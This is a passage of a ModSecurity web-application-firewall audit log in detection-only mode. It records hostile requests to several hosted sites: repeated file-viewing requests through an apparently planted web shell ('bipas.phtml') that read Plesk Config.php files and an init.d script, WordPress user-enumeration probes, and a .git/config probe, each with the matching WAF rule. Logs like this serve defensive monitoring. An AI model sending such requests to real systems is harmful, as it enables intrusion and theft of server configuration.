p5=72, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6b60c21b-Z-- --aeab2e6a-A-- [17/Jun/2025:02:17:26.624489 +0530] aFCC3qC450Yw050Ymr0KzgAAAAk 216.73.216.71 56854 127.0.0.1 7081 --aeab2e6a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.67-bootstrapper%2FUpgrader&viewfile=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.67-bootstrapper%2FUpgrader%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --aeab2e6a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 10711 Connection: close Content-Type: text/html; charset=UTF-8 --aeab2e6a-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.67-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.67-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCC3qC450Yw050Ymr0KzgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106846617160 7415 (- - -) Stopwatch2: 1750106846617160 7415; combined=3282, p1=354, p2=2723, p3=48, p4=48, p5=109, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aeab2e6a-Z-- --e9456b52-A-- [17/Jun/2025:02:18:16.654176 +0530] aFCDD0cTB7P_sALtclD-RwAAAAI 196.251.85.51 42014 127.0.0.1 7081 --e9456b52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 196.251.85.51 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 --e9456b52-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --e9456b52-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.csquaretech.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.csquaretech.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aFCDD0cTB7P_sALtclD-RwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750106895524398 1129853 (- - -) Stopwatch2: 1750106895524398 1129853; combined=1824, p1=313, p2=1413, p3=0, p4=0, p5=97, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e9456b52-Z-- --61214f55-A-- [17/Jun/2025:02:18:17.938566 +0530] aFCDEBwcFb_n1P0IC9x6XAAAAAo 196.251.85.51 42136 127.0.0.1 7081 --61214f55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: www.home9ine.com X-Real-IP: 196.251.85.51 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 14; SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36 --61214f55-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.home9ine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Set-Cookie: _sfs_id=072a69a1695a196d2ca0903e3e4ea6001750106897; expires=Mon, 16 Jun 2025 21:48:17 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: application/json; charset=UTF-8 --61214f55-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.home9ine.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aFCDEBwcFb_n1P0IC9x6XAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750106896168584 1770058 (- - -) Stopwatch2: 1750106896168584 1770058; combined=1857, p1=321, p2=1436, p3=0, p4=0, p5=100, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --61214f55-Z-- --db259731-A-- [17/Jun/2025:02:18:18.970179 +0530] aFCDEqC450Yw050Ymr0K9QAAAAk 196.251.85.51 42414 127.0.0.1 7081 --db259731-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: www.rooferscombine.com X-Real-IP: 196.251.85.51 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36 --db259731-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.rooferscombine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --db259731-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rooferscombine.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aFCDEqC450Yw050Ymr0K9QAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rooferscombine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750106898012984 957311 (- - -) Stopwatch2: 1750106898012984 957311; combined=2214, p1=335, p2=1798, p3=0, p4=0, p5=81, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --db259731-Z-- --a445fb33-A-- [17/Jun/2025:02:18:23.045000 +0530] aFCDF8l682-knofG8qdl0AAAAAM 216.73.216.71 47120 127.0.0.1 7081 --a445fb33-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2FServerInfo&viewfile=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2FServerInfo%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a445fb33-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 10768 Connection: close Content-Type: text/html; charset=UTF-8 --a445fb33-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /opt/psa/admin/plib/serverinfo/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /opt/psa/admin/plib/serverinfo/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCDF8l682-knofG8qdl0AAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106903039557 5500 (- - -) Stopwatch2: 1750106903039557 5500; combined=2207, p1=345, p2=1746, p3=32, p4=34, p5=50, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a445fb33-Z-- --eecbfd79-A-- [17/Jun/2025:02:19:04.720255 +0530] aFCDQFJfblPUQiSn5r12vAAAAAA 216.73.216.71 59552 127.0.0.1 7081 --eecbfd79-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.70-bootstrapper%2FUpgrader&viewfile=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.70-bootstrapper%2FUpgrader%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --eecbfd79-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 10711 Connection: close Content-Type: text/html; charset=UTF-8 --eecbfd79-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.70-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.70-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCDQFJfblPUQiSn5r12vAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106944714454 5870 (- - -) Stopwatch2: 1750106944714454 5870; combined=2425, p1=375, p2=1915, p3=35, p4=43, p5=57, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eecbfd79-Z-- --1e3e037d-A-- [17/Jun/2025:02:19:36.680420 +0530] aFCDYFJfblPUQiSn5r124gAAAAA 216.73.216.71 55712 127.0.0.1 7081 --1e3e037d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2Fpm&viewfile=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2Fpm%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1e3e037d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 6344 Connection: close Content-Type: text/html; charset=UTF-8 --1e3e037d-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /opt/psa/admin/plib/pm/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /opt/psa/admin/plib/pm/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCDYFJfblPUQiSn5r124gAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750106976676691 3818 (- - -) Stopwatch2: 1750106976676691 3818; combined=1702, p1=263, p2=1306, p3=36, p4=40, p5=56, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e3e037d-Z-- --63d73965-A-- [17/Jun/2025:02:20:19.209054 +0530] aFCDi5lL5_2Zd8wUdfLeqwAAAAg 216.73.216.71 42474 127.0.0.1 7081 --63d73965-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.69-bootstrapper%2FUpgrader&viewfile=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.69-bootstrapper%2FUpgrader%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --63d73965-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 10712 Connection: close Content-Type: text/html; charset=UTF-8 --63d73965-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.69-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.69-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCDi5lL5_2Zd8wUdfLeqwAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750107019203868 5253 (- - -) Stopwatch2: 1750107019203868 5253; combined=2031, p1=350, p2=1563, p3=32, p4=34, p5=51, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63d73965-Z-- --68929258-A-- [17/Jun/2025:02:24:43.761313 +0530] aFCEk6RT9PYLci8mxb0T4gAAAAM 170.39.218.2 41904 127.0.0.1 7080 --68929258-B-- GET /.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 170.39.218.2 Connection: close User-Agent: l9explore/1.2.2 Accept-Encoding: gzip --68929258-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --68929258-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config"] [unique_id "aFCEk6RT9PYLci8mxb0T4gAAAAM"] Stopwatch: 1750107283758261 3095 (- - -) Stopwatch2: 1750107283758261 3095; combined=1894, p1=376, p2=1417, p3=27, p4=24, p5=50, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68929258-Z-- --c7eec148-A-- [17/Jun/2025:02:25:00.446623 +0530] aFCEo0cTB7P_sALtclD_ogAAAAI 85.204.70.94 45692 127.0.0.1 7081 --c7eec148-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.rooferscombine.com X-Real-IP: 85.204.70.94 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --c7eec148-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.rooferscombine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --c7eec148-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rooferscombine.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFCEo0cTB7P_sALtclD_ogAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rooferscombine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750107299666285 780422 (- - -) Stopwatch2: 1750107299666285 780422; combined=1223, p1=237, p2=909, p3=0, p4=0, p5=77, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c7eec148-Z-- --b44fa331-A-- [17/Jun/2025:02:25:40.563265 +0530] aFCEzIoVQnPDyHnl9oO5ywAAAAY 216.73.216.71 47952 127.0.0.1 7081 --b44fa331-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fopt%2Fpsa%2Fbootstrapper%2Fpp18.0.68-bootstrapper%2FUpgrader&viewfile=%2F%2Fopt%2Fpsa%2Fbootstrapper%2Fpp18.0.68-bootstrapper%2FUpgrader%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b44fa331-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 10698 Connection: close Content-Type: text/html; charset=UTF-8 --b44fa331-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /opt/psa/bootstrapper/pp18.0.68-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /opt/psa/bootstrapper/pp18.0.68-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCEzIoVQnPDyHnl9oO5ywAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750107340557857 5465 (- - -) Stopwatch2: 1750107340557857 5465; combined=2044, p1=343, p2=1587, p3=30, p4=34, p5=49, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b44fa331-Z-- --16102300-A-- [17/Jun/2025:02:26:26.741392 +0530] aFCE-k3CmevS3xeTzmo5twAAAAQ 216.73.216.71 60240 127.0.0.1 7081 --16102300-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Finit.d%2Fcryptdisks HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --16102300-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3440 Connection: close Content-Type: text/html; charset=UTF-8 --16102300-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/current/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCE-k3CmevS3xeTzmo5twAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/current/etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCE-k3CmevS3xeTzmo5twAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750107386736557 4900 (- - -) Stopwatch2: 1750107386736557 4900; combined=2603, p1=332, p2=2117, p3=40, p4=31, p5=82, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16102300-Z-- --c6b0f029-A-- [17/Jun/2025:02:31:11.608905 +0530] aFCGF4oVQnPDyHnl9oO60wAAAAY 216.73.216.71 58390 127.0.0.1 7081 --c6b0f029-B-- GET 